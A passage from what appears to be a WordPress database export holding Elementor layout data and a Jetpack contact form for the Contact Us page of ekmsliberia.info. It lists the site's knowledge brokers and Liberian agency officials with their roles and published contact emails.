Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19712,80,'_g_feedback_shortcode_07a04e95201fe6f8af3662c711fced461b50b06c','\n[contact-field required=\"1\" type=\"name\" label=\"Name\"/]\n[contact-field required=\"1\" type=\"email\" label=\"Email\"/]\n[contact-field required=\"1\" options=\"Documents (Policies Reports Case Studies Guides etc),Biodiversity,Climate Change,Desertification,News or Blogs,General Inquiry\" type=\"select\" label=\"Select one\"/]\n[contact-field type=\"textarea\" label=\"Message\"/]'),(19713,80,'_g_feedback_shortcode_atts_07a04e95201fe6f8af3662c711fced461b50b06c','a:9:{s:2:\"to\";s:24:\"contact@ekmsliberia.info\";s:7:\"subject\";s:20:\"Contact Form message\";s:12:\"show_subject\";s:2:\"no\";s:6:\"widget\";i:0;s:2:\"id\";i:80;s:18:\"submit_button_text\";s:6:\"Submit\";s:14:\"customThankyou\";s:7:\"message\";s:21:\"customThankyouMessage\";s:30:\"Thank you for your submission!\";s:22:\"customThankyouRedirect\";s:0:\"\";}'),(19714,2882,'_elementor_edit_mode','builder'),(19715,2882,'_elementor_template_type','wp-page'),(19716,2882,'_elementor_version','2.7.5'),(19717,2882,'_wp_page_template','default'),(19718,2882,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c013930\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><!-- wp:jetpack\\/contact-form {\\\"subject\\\":\\\"Contact Form message\\\",\\\"to\\\":\\\"contact@ekmsliberia.info\\\",\\\"hasFormSettingsSet\\\":\\\"yes\\\",\\\"customThankyou\\\":\\\"message\\\"} --><\\/p><p><!-- wp:jetpack\\/field-name {\\\"required\\\":true} \\/--><\\/p><p><!-- wp:jetpack\\/field-email {\\\"required\\\":true} \\/--><\\/p><p><!-- wp:jetpack\\/field-select {\\\"required\\\":true,\\\"options\\\":[\\\"Documents (Policies Reports Case Studies Guides etc)\\\",\\\"Biodiversity\\\",\\\"Climate Change\\\",\\\"Desertification\\\",\\\"News or Blogs\\\",\\\"General Inquiry\\\"]} \\/--><\\/p><p><!-- wp:jetpack\\/field-textarea \\/--><!-- \\/wp:jetpack\\/contact-form --><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d